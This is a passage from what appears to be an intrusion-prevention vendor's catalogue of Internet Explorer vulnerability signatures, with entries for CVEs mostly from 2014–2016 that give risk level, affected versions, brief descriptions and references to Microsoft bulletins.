CVE-2014-2820
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2820
OSVDB-109951
http://www.osvdb.org/109951
MS14-051
http://technet.microsoft.com/security/bulletin/MS14-051
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2823

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 8; Windows 8.1; Windows 7; Windows 2008 R2; Windows 2012 R2
Software: Internet Explorer 11.0
Type: Input Validation
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2823
References:
CVE-2014-2823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2823
MS14-051
http://technet.microsoft.com/security/bulletin/MS14-051
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2824

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP2; Windows 2003; Windows 2008; Windows 2008 R2; Windows 7
Software: Internet Explorer 8.0
Type: Input Validation
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2824
References:
CVE-2014-2824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2824
MS14-051
http://technet.microsoft.com/security/bulletin/MS14-051
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4050

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 8; Windows 8.1; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4050
References:
CVE-2014-4050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4050
OSVDB-109959
http://www.osvdb.org/109959
MS14-051
http://technet.microsoft.com/security/bulletin/MS14-051
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4126

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-611-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4126
References:
CVE-2014-4126
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4126
BID-70328
http://www.securityfocus.com/bid/70328
MS14-056
http://technet.microsoft.com/security/bulletin/MS14-056
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4127

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-611-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4127
References:
CVE-2014-4127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4127
BID-70329
http://www.securityfocus.com/bid/70329
MS14-056
http://technet.microsoft.com/security/bulletin/MS14-056
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4130

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-611-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4130
References:
CVE-2014-4130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4130
BID-70332
http://www.securityfocus.com/bid/70332
MS14-056
http://technet.microsoft.com/security/bulletin/MS14-056
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4140

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-611-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-4140
References:
CVE-2014-4140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4140
BID-70325
http://www.securityfocus.com/bid/70325
MS14-056
http://technet.microsoft.com/security/bulletin/MS14-056
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-8967

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0; Internet Explorer 9.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-8967
References:
CVE-2014-8967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8967
BID-71483
http://www.securityfocus.com/bid/71483
MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0018

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0018
References:
CVE-2015-0018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0018
BID-72403
http://www.securityfocus.com/bid/72403
MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0036

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 8.0; Internet Explorer 7.0; Internet Explorer 6.0
Type: Input Validation
Description: An integer overflow vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an improper boundary check on the direction attribute value of a shadow filter. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0036
References:
CVE-2015-0036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0036
BID-72446
http://www.securityfocus.com/bid/72446
OSVDB-118156
http://www.osvdb.org/118156
MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0046

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0
Type: Input Validation
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to a type confusion flaw while handling certain objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0046
References:
CVE-2015-0046
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0046
BID-72416
http://www.securityfocus.com/bid/72416
OSVDB-118166
http://www.osvdb.org/118166
MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-1634

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 8.0; Internet Explorer 7.0; Internet Explorer 6.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-1634
References:
CVE-2015-1634
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1634
BID-72931
http://www.securityfocus.com/bid/72931
MS15-018
http://technet.microsoft.com/security/bulletin/MS15-018
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2401

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2401
References:
CVE-2015-2401
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2401
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2404

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 8.0; Internet Explorer 7.0; Internet Explorer 6.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2404
References:
CVE-2015-2404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2404
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2406

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 8.0; Internet Explorer 7.0; Internet Explorer 6.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2406
References:
CVE-2015-2406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2406
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2408

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2408
References:
CVE-2015-2408
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2408
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2422

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 8.0; Internet Explorer 7.0; Internet Explorer 6.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2422
References:
CVE-2015-2422
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2422
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2425

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Input Validation
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling MutationObserver objects when processing HTML and script code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2425
References:
CVE-2015-2425
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2425
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2492

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-679-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2492
References:
CVE-2015-2492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2492
MS15-094
http://technet.microsoft.com/security/bulletin/MS15-094
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6083

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-740-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6083
References:
CVE-2015-6083
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6083
BID-78481
http://www.securityfocus.com/bid/78481
MS15-124
http://technet.microsoft.com/security/bulletin/MS15-124
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6088

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-ASLR-Bypass-CVE-2015-6088
References:
CVE-2015-6088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6088
MS15-112
http://technet.microsoft.com/security/bulletin/MS15-112
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6160

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Input Validation
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6160
References:
CVE-2015-6160
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6160
MS15-124
http://technet.microsoft.com/security/bulletin/MS15-124
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2016-0108

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-741-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Input Validation
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer 11.0. A remote attacker could use this to execute arbitrary code on the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2016-0108
References:
CVE-2016-0108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0108
MS16-023
http://technet.microsoft.com/security/bulletin/MS16-023
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4080

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There is a memory corruption vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4080
References:
CVE-2014-4080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4080
MS14-052
http://technet.microsoft.com/security/bulletin/MS14-052
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4081

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There is a memory corruption vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4081
References:
CVE-2014-4081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4081
MS14-052
http://technet.microsoft.com/security/bulletin/MS14-052
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4086

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 2003; Windows XP; Windows XP SP2
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a memory corruption vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4086
References:
CVE-2014-4086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4086
MS14-052
http://technet.microsoft.com/security/bulletin/MS14-052
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4088

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows XP SP2; Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There is a memory corruption vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4088
References:
CVE-2014-4088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4088
MS14-052
http://technet.microsoft.com/security/bulletin/MS14-052
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4089

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 2003; Windows XP; Windows XP SP2; Windows 7; Windows 8; Windows 2008; Windows 2012
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There is a memory corruption vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4089
References:
CVE-2014-4089
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4089
MS14-052
http://technet.microsoft.com/security/bulletin/MS14-052
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4092

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 2003; Windows XP; Windows XP SP2; Windows 7; Windows 8; Windows 2008; Windows 2012
Software: Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There is a memory corruption vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4092-2
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4092-1
References:
CVE-2014-4092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4092
MS14-052
http://technet.microsoft.com/security/bulletin/MS14-052
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4094

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 2003; Windows XP; Windows XP SP2; Windows 7; Windows 8; Windows 2008; Windows 2012
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There is a memory corruption vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4094
References:
CVE-2014-4094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4094
MS14-052
http://technet.microsoft.com/security/bulletin/MS14-052
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4095

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 8; Windows 2008; Windows 2012
Software: Internet Explorer 11.0
Type: Malfunction
Description: There is a memory corruption vulnerability in Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4095
References:
CVE-2014-4095
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4095
MS14-052
http://technet.microsoft.com/security/bulletin/MS14-052
Back to top

Microsoft-Internet-Explorer-Mismatched-DOM-Objects-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. The memory corruption happens when an improperly initialized function is called via the onLoad handler, leading to a condition that may allow code execution in the context of the current user.
Situation: HTTP_Microsoft-Internet-Explorer-Mismatched-DOM-Objects-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Mismatched-DOM-Objects-Memory-Corruption
References:
CVE-2005-1590
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1590
BID-13799
http://www.securityfocus.com/bid/13799
OSVDB-15897
http://www.osvdb.org/15897
MS05-054
http://technet.microsoft.com/security/bulletin/MS05-054
Back to top

Microsoft-Internet-Explorer-Mouse-Movement-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Malfunction
Description: Microsoft Internet Explorer is vulnerable to an information disclosure vulnerability. The vulnerability allows a web page to track mouse movements using script code, even if the page is not active or in focus. This can also track the state of Ctrl, Shift and Alt keys. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web page. Successful exploitation would result in the disclosure of mouse movements. This may have particular consequences when using virtual keyboards or graphical authentication methods.
Situation: File-Text_Microsoft-Internet-Explorer-Mouse-Movement-Information-Disclosure
References:
BID-56921
http://www.securityfocus.com/bid/56921
OSVDB-88357
http://www.osvdb.org/88357
Back to top

Microsoft-Internet-Explorer-msxml3-Concurrency-Vulnerability

About this vulnerability: There is a memory corruption vulnerability in Microsoft Internet Explorer
Risk: Low
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a remote memory corruption vulnerability in Microsoft Internet Explorer. With a crafted XML page, it is possible to cause a memory corruption in the context of the browser. This leads to abnormal browser termination.
Situation: HTTP_SS-Microsoft-Internet-Explorer-msxml3-Concurrency-Vulnerability
File-Text_Microsoft-Internet-Explorer-msxml3-Concurrency-Vulnerability
References:
CVE-2007-0099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0099
BID-21872
http://www.securityfocus.com/bid/21872
OSVDB-32627
http://www.osvdb.org/32627
MS08-069
http://technet.microsoft.com/security/bulletin/MS08-069
Back to top

Microsoft-Internet-Explorer-Multiple-Event-Handler-Memory-Corruption

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0
Type: Input Validation
Description: There is a buffer overflow vulnerability in Microsoft Internet Explorer related to rendering an HTML element with many event handlers.
Situation: File-Text_Microsoft-Internet-Explorer-Multiple-Event-Handler-Memory-Corruption
References:
CVE-2006-1245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1245
BID-17131
http://www.securityfocus.com/bid/17131
OSVDB-23964
http://www.osvdb.org/23964
MS06-013
http://technet.microsoft.com/security/bulletin/MS06-013
Back to top

Microsoft-Internet-Explorer-Multiple-Events-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows Vista; Windows 7; Windows 2003; Windows 2008
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0
Type: Malfunction
Description: A remote code execution vulnerability exists in Internet Explorer. The vulnerability is due to the use of an object after it has been deleted (use-after-free). A remote, unauthenticated attacker can exploit this vulnerability by enticing a target user to open either an HTML document with Internet Explorer, or a Microsoft Office document with an embedded "safe for initialization" ActiveX component that hosts the IE rendering engine. A successful exploitation attempt could result in the execution of arbitrary code in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Multiple-Events-Use-After-Free
References:
CVE-2012-1878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1878
BID-53867
http://www.securityfocus.com/bid/53867
OSVDB-82868
http://www.osvdb.org/82868
MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037
Back to top

Microsoft-Internet-Explorer-Null-Byte-CVE-2012-0012

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Null-Byte-CVE-2012-0012
File-Text_Microsoft-Internet-Explorer-HTML-Layout-CVE-2012-0011
References:
CVE-2012-0012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0012
MS12-010
http://technet.microsoft.com/security/bulletin/MS12-010
Back to top

Microsoft-Internet-Explorer-Null-Byte-CVE-2012-1873

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-457-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 8.0; Internet Explorer 7.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Null-Byte-CVE-2012-1873
References:
CVE-2012-1873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1873
MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037
Back to top

Microsoft-Internet-Explorer-Null-Byte-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0
Type: Malfunction
Description: There exists an information disclosure vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Null-Byte-Information-Disclosure
References:
CVE-2012-0012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0012
BID-51932
http://www.securityfocus.com/bid/51932
OSVDB-79267
http://www.osvdb.org/79267
MS12-010
http://technet.microsoft.com/security/bulletin/MS12-010
Back to top

Microsoft-Internet-Explorer-Object-Management-CVE-2011-1345

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows XP; Windows 2003; Windows 2008; Windows 7; Windows 2008 R2
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
